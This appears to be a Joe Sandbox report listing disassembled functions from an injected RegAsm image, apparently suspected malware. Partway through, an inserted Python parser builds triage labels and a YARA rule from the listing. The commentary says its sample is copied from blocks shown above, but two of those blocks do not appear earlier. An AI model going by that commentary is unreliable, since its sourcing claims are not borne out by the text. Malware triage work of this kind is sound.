                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$??2@CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 1023896661-0
                                                                        • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                        • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                        • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                        • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                        • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 2445788494-0
                                                                        • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                        • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                        APIs
                                                                        Strings
                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: malloc
                                                                        • String ID: failed to allocate %u bytes of memory
                                                                        • API String ID: 2803490479-1168259600
                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
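The blocks above list, per function, the APIs reached (directly or through a named subcall), the strings referenced, and the Similarity identifiers (API ID, String ID, the combined API String ID hash pair and the opcode/instruction hashes). The script below is an added example, not code from the Joe Sandbox report or from Joe Security: it parses that listing into records and pulls out what a triage analyst wants from it, namely which API combinations occur in one function (here GetSystemDirectoryW, wcscat and LoadLibraryW inside subcall 0040A804, a DLL loaded from a path built under the system directory), which function compares against a given string (the _wcsicmp block with `/stext`), and a YARA string set built from the longer strings. SAMPLE is copied from three of the blocks above with indentation removed and a few Similarity lines dropped; the indicator labels, and the reading of `/stext` as a NirSoft-style save-to-text switch, are this example's assumptions rather than findings of the report.

```python
"""Triage parser for the per-function blocks of a Joe Sandbox report (the
'APIs / Strings / Memory Dump Source / Similarity' listing above). Added example,
not code from the report or from Joe Security; SAMPLE is copied from three blocks
above (indentation removed, a few Similarity lines dropped), all else is assumed."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• _mbscpy.MSVCRT ref: 00405250
• _mbscat.MSVCRT ref: 0040525B
Similarity
• API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
• String ID:
• API String ID: 568699880-0
• Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# '[Part of subcall function ADDR: ]func.MODULE[(args)], ref: CALLSITE'
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-F]{8}): )?"
                    r"([^.\s]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?,? ref: ([0-9A-F]{8})$")
STRING_RE = re.compile(r"^(.*), xrefs: ([0-9A-F]{8})$")
# via = address of the subcall function the API is reached through, None for a direct call
ApiCall = namedtuple("ApiCall", "name module args ref via")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # every 'Key: value' line outside APIs/Strings

    def api_names(self):
        return [c.name for c in self.apis]

def parse_blocks(text):
    """One FunctionBlock per listing; a block ends at its 'Instruction Fuzzy Hash' line."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•") or section is None:
            continue
        entry = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(entry)):
            via, name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, args.split(",") if args else [], ref, via))
        elif section == "Strings" and (m := STRING_RE.match(entry)):
            cur.strings.append(m.group(1))
        elif section not in ("APIs", "Strings"):
            key, _, value = entry.partition(":")
            cur.meta[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur, section = FunctionBlock(), None
    return blocks

def indicators(block):
    """Behaviour labels derived only from what the block itself lists."""
    names, meta, found = set(block.api_names()), block.meta, []
    if {"GetSystemDirectoryW", "wcscat", "LoadLibraryW"} <= names:
        found.append("builds a path under the system directory and loads a DLL from it")
    if meta.get("API ID") == "_wcsicmp" and meta.get("String ID") == "/stext":
        # Assumption of this example: '/stext' is the NirSoft save-to-text switch.
        found.append("case-insensitive compare against '/stext'")
    if meta.get("API ID") == "malloc" and any(s.startswith("failed to allocate") for s in block.strings):
        found.append("malloc wrapper that reports allocation failure")
    return found

def yara_strings(blocks, min_len=6):
    """Unique strings long enough to anchor a YARA rule (one-letter strings such as 'd' drop out)."""
    return sorted({s for b in blocks for s in b.strings + [b.meta.get("String ID", "")] if len(s) >= min_len})

def yara_rule(name, strings):
    body = "\n".join(f'        $s{i} = "{s}" wide ascii' for i, s in enumerate(strings))
    return f"rule {name} {{\n    strings:\n{body}\n    condition:\n        all of them\n}}"
```

Run `parse_blocks` over the whole listing rather than the trimmed SAMPLE to get one record per function; the `API String ID` pair is the report's own identifier for a block's API/string combination, so it is the right key for de-duplicating blocks across several dumps of the same injected image (here every block comes from the same `hcaresult_15_2_400000_RegAsm.jbxd` snapshot). The generated rule is a starting point only: the strings in this section are short and `/stext` on its own would also match legitimate tooling, so pair it with the DLL-loading and injection behaviour before treating a hit as Remcos.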
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                        • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmpmemset
                                                                        • String ID:
                                                                        • API String ID: 1065087418-0
                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                        APIs
                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                        • CloseHandle.KERNEL32(?), ref: 00410654
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                        • String ID:
                                                                        • API String ID: 1381354015-0
                                                                        • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                        • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID:
                                                                        • API String ID: 2221118986-0
                                                                        • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                        • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                        • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                        • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                        • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                        • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                        • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                        APIs
                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                        • String ID:
                                                                        • API String ID: 2154303073-0
                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 3154509469-0
                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                        APIs
                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                        • String ID:
                                                                        • API String ID: 4232544981-0
                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                        APIs
                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                        Similarity
                                                                        • API ID: FileModuleName
                                                                        • String ID:
                                                                        • API String ID: 514040917-0
                                                                        APIs
                                                                        • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        APIs
                                                                        • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                        Similarity
                                                                        • API ID: EnumNamesResource
                                                                        • String ID:
                                                                        • API String ID: 3334572018-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        APIs
                                                                        • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                        Similarity
                                                                        • API ID: CloseFind
                                                                        • String ID:
                                                                        • API String ID: 1863332320-0
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004095FC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 3655998216-0
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00445426
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                        • String ID:
                                                                        • API String ID: 1828521557-0
                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                        APIs
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                        • memcpy.MSVCRT ref: 00406942
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@FilePointermemcpy
                                                                        • String ID:
                                                                        • API String ID: 609303285-0
                                                                        • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                        • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID:
                                                                        • API String ID: 2081463915-0
                                                                        • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                        • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                        APIs
                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                        • String ID:
                                                                        • API String ID: 2136311172-0
                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                        APIs
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@
                                                                        • String ID:
                                                                        • API String ID: 1936579350-0
                                                                        • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
